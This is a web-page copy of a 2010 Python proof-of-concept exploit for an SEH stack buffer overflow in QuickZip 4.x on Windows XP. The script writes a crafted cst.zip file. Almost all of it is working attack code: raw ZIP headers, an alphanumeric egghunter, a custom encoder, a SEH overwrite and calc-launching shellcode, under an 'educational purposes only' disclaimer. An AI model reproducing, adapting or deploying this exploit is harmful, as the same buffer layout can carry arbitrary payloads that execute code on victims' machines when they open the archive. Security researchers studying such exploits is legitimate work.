QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit

Document Sample
QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit Powered By Docstoc
					                      QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit               Page 1/3
  1    #!/usr/bin/python
  2    #
  3    # ###############################################################################
  4    # Exploit Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
  5    # Date          : 9/3/2010
  6    # Author        : corelanc0d3r & mr_me
  7    # Bug found by : corelanc0d3r (http://corelan.be:8800/)
  8    # Software Link : http://www.quickzip.org/downloads.html
  9    # Version       : 4.60
  10   # OS            : Windows
  11   # Tested on     : XP SP3 En
  12   # Type of vuln : SEH
  13   # Greetz to     : Corelan Security Team
  14   # http://www.corelan.be:8800/index.php/security/corelan−team−members/
  15   # ###############################################################################
  16   # Script provided ’as is’, without any warranty.
  17   # Use for educational purposes only.
  18   # Do not use this code to do anything illegal !
  19   #
  20   # Note : you are not allowed to edit/modify this code.
  21   # If you do, Corelan cannot be held responsible for any damages this may cause.
  22   #
  23   # how does this work?
  24   # http://www.offensive−security.com/blog/vulndev/quickzip−stack−bof−0day−a−box−of−chocolates/
  25
  26   print   "|−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|"
  27   print   "|                   __             __                 |"
  28   print   "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
  29   print   "| / ___/ __ \/ ___/ _ \/ / __ ‘/ __ \ / __/ _ \/ __ ‘/ __ ‘__ \ |"
  30   print   "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
  31   print   "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
  32   print   "|                                                  |"
  33   print   "|                              http://www.corelan.be:8800 |"
  34   print   "|                                    security@corelan.be |"
  35   print   "|                                                  |"
  36   print   "|−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−[ EIP Hunters ]−−|"
  37   print   "[+] QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit"
  38
  39   header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  40   "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
  41
  42   header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  43   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
  44   "\x24\x00\x00\x00\x00\x00\x00\x00")
  45
  46   header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
  47   "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")
  48
  49   # pure ascii egghunter, thanks to skylined
  50   egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
  51   "9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");
  52

corelanc0d3r and mr_me                                                                                 03/08/2010
                       QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit   Page 2/3
  53    calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
  54    "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
  55    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
  56    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
  57    "\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
  58    "\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
  59    "\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
  60    "\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
  61    "\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
  62    "\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
  63    "\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
  64    "\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
  65    "\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
  66    "\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
  67    "\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
  68    "\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
  69    "\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
  70    "\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
  71    "\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
  72    "\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
  73    "\x50\x41\x41");
  74
  75    # custom encoder
  76    encoder = ("\x25\x4A\x4D\x4E\x55"
  77    "\x25\x35\x32\x31\x2A"
  78    "\x2d\x55\x55\x55\x5f"
  79    "\x2d\x56\x55\x56\x5f"
  80    "\x2d\x55\x55\x55\x5e"
  81    "\x50"
  82    "\x25\x4A\x4D\x4E\x55"
  83    "\x25\x35\x32\x31\x2A"
  84    "\x2d\x2b\x6a\x32\x53"
  85    "\x2d\x2a\x6a\x31\x54"
  86    "\x2d\x2a\x69\x31\x54"
  87    "\x50"
  88    );
  89
  90    print "[+] Building PoC.."
  91
  92    lol   = "\x43" * 20
  93    lol   += egghunter
  94    lol   += "\x41" * (223−len(lol))
  95    lol   += "\x61"
  96    lol   += "\x53"
  97    lol   += "\x5c"
  98    lol   += encoder
  99    lol   += "\x41" * (294−len(lol))
  100   lol   += "\x73\xf9\x41\x41"
  101   lol   += "\x5c\x53\x46\x00"
  102   lol   += "W00TW00T"
  103   lol   += calc
  104   lol   += "\x42" * (4064−len(lol))
corelanc0d3r and mr_me                                                                      03/08/2010
                        QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit   Page 3/3
  105   lol += ".txt"
  106
  107   exploit = header_1 + lol + header_2 + lol + header_3
  108
  109   mefile = open(’cst.zip’,’w’);
  110   mefile.write(exploit);
  111   mefile.close()
  112   print "[+] Exploit complete!"




corelanc0d3r and mr_me                                                                       03/08/2010

				
DOCUMENT INFO